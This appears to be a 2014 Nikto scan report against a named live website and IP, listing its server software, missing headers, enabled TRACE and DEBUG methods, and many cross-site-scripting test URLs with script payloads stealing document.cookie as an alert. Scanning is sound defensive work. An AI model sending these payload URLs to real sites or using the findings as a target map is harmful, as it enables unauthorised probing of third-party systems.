| www.kraslib.ru / 212.41.1.155 port 80 |
| Target IP | 212.41.1.155 |
| Target hostname | www.kraslib.ru |
| Target Port | 80 |
| HTTP Server | Apache/2.2.15 (CentOS) |
| Site Link (Name) | http://www.kraslib.ru:80 |
| Site Link (IP) | http://212.41.1.155:80 |
| URI | / |
| HTTP Method | GET |
| Description | Retrieved x-powered-by header: PHP/5.3.3 |
| Test Links |
http://www.kraslib.ru:80/ http://212.41.1.155:80/ |
| OSVDB Entries | OSVDB-0 |
| URI | / |
| HTTP Method | GET |
| Description | The anti-clickjacking X-Frame-Options header is not present. |
| Test Links |
http://www.kraslib.ru:80/ http://212.41.1.155:80/ |
| OSVDB Entries | OSVDB-0 |
| URI | / |
| HTTP Method | GET |
| Description | Multiple index files found: index.php, index.html |
| Test Links |
http://www.kraslib.ru:80/ http://212.41.1.155:80/ |
| OSVDB Entries | OSVDB-0 |
| URI | /favicon.ico |
| HTTP Method | GET |
| Description | Server leaks inodes via ETags, header found with file /favicon.ico, inode: 3810780, size: 29926, mtime: 0x4e18904ac1c00 |
| Test Links |
http://www.kraslib.ru:80/favicon.ico http://212.41.1.155:80/favicon.ico |
| OSVDB Entries | OSVDB-0 |
| URI | / |
| HTTP Method | HEAD |
| Description | Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current. |
| Test Links |
http://www.kraslib.ru:80/ http://212.41.1.155:80/ |
| OSVDB Entries | OSVDB-0 |
| URI | HASH(0x16407f0) |
| HTTP Method | DEBUG |
| Description | DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details. |
| Test Links |
http://www.kraslib.ru:80HASH(0x16407f0) http://212.41.1.155:80HASH(0x16407f0) |
| OSVDB Entries | OSVDB-0 |
| URI | / |
| HTTP Method | TRACE |
| Description | HTTP TRACE method is active, suggesting the host is vulnerable to XST |
| Test Links |
http://www.kraslib.ru:80/ http://212.41.1.155:80/ |
| OSVDB Entries | OSVDB-877 |
| URI | /index.php?option=search&searchword=<script>alert(document.cookie);</script> |
| HTTP Method | GET |
| Description | /index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). CA-2000-02. |
| Test Links |
http://www.kraslib.ru:80/index.php?option=search&searchword=<script>alert(document.cookie);</script> http://212.41.1.155:80/index.php?option=search&searchword=<script>alert(document.cookie);</script> |
| OSVDB Entries | OSVDB-0 |
| URI | /index.php?dir=<script>alert('Vulnerable')</script> |
| HTTP Method | GET |
| Description | /index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks. |
| Test Links |
http://www.kraslib.ru:80/index.php?dir=<script>alert('Vulnerable')</script> http://212.41.1.155:80/index.php?dir=<script>alert('Vulnerable')</script> |
| OSVDB Entries | OSVDB-2820 |
| URI | /index.php?file=Liens&op=\"><script>alert('Vulnerable');</script> |
| HTTP Method | GET |
| Description | /index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). CA-2000-02. |
| Test Links |
http://www.kraslib.ru:80/index.php?file=Liens&op=\"><script>alert('Vulnerable');</script> http://212.41.1.155:80/index.php?file=Liens&op=\"><script>alert('Vulnerable');</script> |
| OSVDB Entries | OSVDB-50552 |
| URI | /index.php?action=storenew&username=<script>alert('Vulnerable')</script> |
| HTTP Method | GET |
| Description | /index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02. |
| Test Links |
http://www.kraslib.ru:80/index.php?action=storenew&username=<script>alert('Vulnerable')</script> http://212.41.1.155:80/index.php?action=storenew&username=<script>alert('Vulnerable')</script> |
| OSVDB Entries | OSVDB-0 |
| URI | /index.php/\"><script><script>alert(document.cookie)</script>< |
| HTTP Method | GET |
| Description | /index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02. |
| Test Links |
http://www.kraslib.ru:80/index.php/\"><script><script>alert(document.cookie)</script>< http://212.41.1.155:80/index.php/\"><script><script>alert(document.cookie)</script>< |
| OSVDB Entries | OSVDB-0 |
| URI | /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script> |
| HTTP Method | GET |
| Description | /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02. |
| Test Links |
http://www.kraslib.ru:80/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script> http://212.41.1.155:80/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script> |
| OSVDB Entries | OSVDB-50553 |
| URI | /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search |
| HTTP Method | GET |
| Description | /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02. |
| Test Links |
http://www.kraslib.ru:80/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search http://212.41.1.155:80/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search |
| OSVDB Entries | OSVDB-50553 |
| URI | /?mod=<script>alert(document.cookie)</script>&op=browse |
| HTTP Method | GET |
| Description | /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02. |
| Test Links |
http://www.kraslib.ru:80/?mod=<script>alert(document.cookie)</script>&op=browse http://212.41.1.155:80/?mod=<script>alert(document.cookie)</script>&op=browse |
| OSVDB Entries | OSVDB-38019 |
| URI | /index.php?rep=<script>alert(document.cookie)</script> |
| HTTP Method | GET |
| Description | /index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS. |
| Test Links |
http://www.kraslib.ru:80/index.php?rep=<script>alert(document.cookie)</script> http://212.41.1.155:80/index.php?rep=<script>alert(document.cookie)</script> |
| OSVDB Entries | OSVDB-25497 |
| URI | /index.php?err=3&email=\"><script>alert(document.cookie)</script> |
| HTTP Method | GET |
| Description | /index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field. |
| Test Links |
http://www.kraslib.ru:80/index.php?err=3&email=\"><script>alert(document.cookie)</script> http://212.41.1.155:80/index.php?err=3&email=\"><script>alert(document.cookie)</script> |
| OSVDB Entries | OSVDB-12606 |
| URI | /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 |
| HTTP Method | GET |
| Description | /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. |
| Test Links |
http://www.kraslib.ru:80/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 http://212.41.1.155:80/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 |
| OSVDB Entries | OSVDB-12184 |
| URI | /index.php?vo=\"><script>alert(document.cookie);</script> |
| HTTP Method | GET |
| Description | /index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). CA-2000-02. |
| Test Links |
http://www.kraslib.ru:80/index.php?vo=\"><script>alert(document.cookie);</script> http://212.41.1.155:80/index.php?vo=\"><script>alert(document.cookie);</script> |
| OSVDB Entries | OSVDB-2790 |
| URI | /icons/README |
| HTTP Method | GET |
| Description | /icons/README: Apache default file found. |
| Test Links |
http://www.kraslib.ru:80/icons/README http://212.41.1.155:80/icons/README |
| OSVDB Entries | OSVDB-3233 |
| Host Summary |
| Start Time | 2014-04-10 17:36:57 |
| End Time | 2014-04-10 17:38:28 |
| Elapsed Time | 91 seconds |
| Statistics | 6544 items checked, 0 errors, 20 findings |
| Scan Summary |
| Software Details | Nikto 2.1.5 |
| CLI Options | -h www.kraslib.ru -Format htm -output 1.html |
| Hosts Tested | 1 |
| Start Time | Thu Apr 10 17:36:46 2014 |
| End Time | Thu Apr 10 17:38:28 2014 |
| Elapsed Time | 102 seconds |
© 2008 CIRT, Inc.